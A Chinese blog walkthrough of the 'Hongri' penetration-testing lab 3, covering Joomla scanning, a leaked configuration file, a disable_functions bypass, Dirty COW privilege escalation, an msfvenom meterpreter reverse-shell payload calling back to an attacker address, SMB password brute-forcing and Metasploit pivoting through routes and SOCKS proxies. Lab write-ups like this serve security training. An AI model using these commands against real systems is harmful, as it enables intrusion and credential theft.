当前位置: 首页 > news >正文

红日靶场3

红日靶场3

最好一次性打完,centos重新开机可能会退出登录

centos重新获取NAT模式网卡ip:service network restart

ifdown eth0 ifup eth0

出网ip: 192.168.163.128

采用了Joomla的CMS,直接用kali自带工具joomscan进行扫描,发现

http://192.168.163.128/administrator/

http://192.168.163.128/configuration.php~

找到账号密码后登录

登录后发现joomla后台登录的账号和密码,修改密码

发现无论输入任何指令,返回的信息 只有 ret=127,猜测使用了disable_functions,使用专门的插件绕过

拿到192.168.93.120的ubuntu 机器的权限

拿到了Centos的shell,执行命令返回的是Ubuntu(web1)的信息,说明Centos是Ubuntu的反向代理

正向代理和反向代理的区别虽然正向代理服务器和反向代理服务器所处的位置都是客户端和真实服务器之间,所做的事情也都是把客户端的请求转发给服务器,再把服务器的响应转发给客户端,但是二者之间还是有一定的差异的。1、正向代理其实是客户端的代理,帮助客户端访问其无法访问的服务器资源。反向代理则是服务器的代理,帮助服务器做负载均衡,安全防护等。2、正向代理一般是客户端架设的,比如在自己的机器上安装一个代理软件。而反向代理一般是服务器架设的,比如在自己的机器集群中部署一个反向代理服务器。3、正向代理中,服务器不知道真正的客户端到底是谁,以为访问自己的就是真实的客户端。而在反向代理中,客户端不知道真正的服务器是谁,以为自己访问的就是真实的服务器。4、正向代理和反向代理的作用和目的不同。正向代理主要是用来解决访问限制问题。而反向代理则是提供负载均衡、安全防护等作用。二者均能提高访问速度。

发现一组账号密码:wwwuser:wwwuser_123Aqx,ssh登录,拿到Centos普通用户 权限

脏牛提权

MSF

Kali (MSF)↓ 反弹
CentOS (root + meterpreter)↓ pivot
192.168.93.0/24 域内其他主机

先生成一个shellcode

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.111.132 LPORT=7890 -f elf > mshell.elf

将mshell.elf传到Centos上,然后启动监听

主机探测

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.0/24
exploit

发现存在192.168.93.10,192.168.93.20,192.168.93.30三台主机

进行弱口令爆破

use auxiliary/scanner/smb/smb_login
set SMBUSER administrator
set PASS_FILE /root/pass.txt
set rhosts 192.168.93.20
run

得到密码zxcASDqw123!!

路由转发Sock代理

路由转发只能将msfconsole带进内网,而要想将攻击机上的其他攻击程序也带进内网还需要搭建socks代理。

添加路由
route add 0.0.0.0 0.0.0.0 1 
搭建Socks4a代理
use auxiliary/server/socks4a
set SRVHOST  0.0.0.0
set SRVPORT  1080
run
搭建Socks5代理
use auxiliary/server/socks5
set SRVHOST  0.0.0.0
set SRVPORT  1080
set USERNAME root
set PASSWORD Password@
run
http://www.jsqmd.com/news/322362/

相关文章:

  • 基于 FastAdmin+ThinkPHP 的二维码防伪系统
  • 2026年宁夏银川评价高的户外站岗岗亭实力厂家推荐排行榜,移动岗亭/成品移动岗亭/移动房屋,户外站岗岗亭定制口碑排行
  • 导师严选9个AI论文写作软件,MBA毕业论文轻松搞定!
  • ABAP OO的基本构造
  • 2026年太阳能路灯与庭院灯厂家如何选、推荐哪家?绿色照明与人居美学的融合新范式
  • Java毕设选题推荐:基于javaee的超市外卖系统的设计与实现基于springboot的超市外卖商城系统的设计与实现【附源码、mysql、文档、调试+代码讲解+全bao等】
  • 机器人租售怎么用?全按客户节奏
  • Java毕设选题推荐:基于spring boot的学生选课课程系统的设计与实现基于springboot的学生选课管理系统的设计与实现【附源码、mysql、文档、调试+代码讲解+全bao等】
  • 学霸同款2026 TOP10 AI论文平台:继续教育写作全测评
  • 腾讯云EdgeOne Pages,边缘AI协同重构应用交付范式
  • 计算机Java毕设实战-基于springboot的物业管理系统的设计与实现业主管理、设施维护、报修处理、缴费查询和社区活动【完整源码+LW+部署说明+演示视频,全bao一条龙等】
  • 淮南市英语雅思培训机构推荐/2026权威测评出国雅思辅导机构口碑榜单
  • 2026油田多参数传感器(油品传感器)品牌盘点+选购指南,国产实力与国外品质双向优选
  • 制作表情包制作简易工具,上传图片,添加文字,特效,支持自定义编辑,一键保存,帮用户制作专属表情包,提升社交趣味性。
  • 淮南市英语雅思培训机构推荐,2026权威测评出国雅思辅导机构口碑榜单
  • 计算机Java毕设实战-基于javaee的超市外卖系统的设计与实现基于springboot的超市外卖商城系统的设计与实现【完整源码+LW+部署说明+演示视频,全bao一条龙等】
  • Spring Boot 从接口设计到业务编排 - 详解
  • 2026年浏阳淘金设备厂家最新推荐榜,聚焦企业生产实力与产品适配性深度剖析
  • 2026年车辆工程与智能控制国际学术会议(VEIC 2026)
  • 【课程设计/毕业设计】基于springboot的物业管理系统的设计与实现居民小区物业管理系统在线报修、费用缴纳、通知推送、车位管理及业主议事【附源码、数据库、万字文档】
  • 基于粒子群算法的分布式电源选址定容探索
  • 临沂市英语雅思培训机构推荐:2026权威测评出国雅思辅导机构口碑榜单
  • 蚌埠市英语雅思培训机构推荐/2026权威测评出国雅思辅导机构口碑榜单
  • 蚌埠市英语雅思培训机构推荐,2026权威测评出国雅思辅导机构口碑榜单
  • 量子算法测试入门指南
  • 【课程设计/毕业设计】基于springboot的超市外卖商城系统的设计与实现基于javaee的超市外卖系统的设计与实现【附源码、数据库、万字文档】
  • Dify插件没有想象中难:如何15分钟做出属于自己的AI工具?
  • Win11 的 WSL2环境下配置 Docker Desktop 和 Minikube
  • 淮南市英语雅思培训机构推荐;2026权威测评出国雅思辅导机构口碑榜单
  • STM32F407通过UART读取JY-901加速度数据方案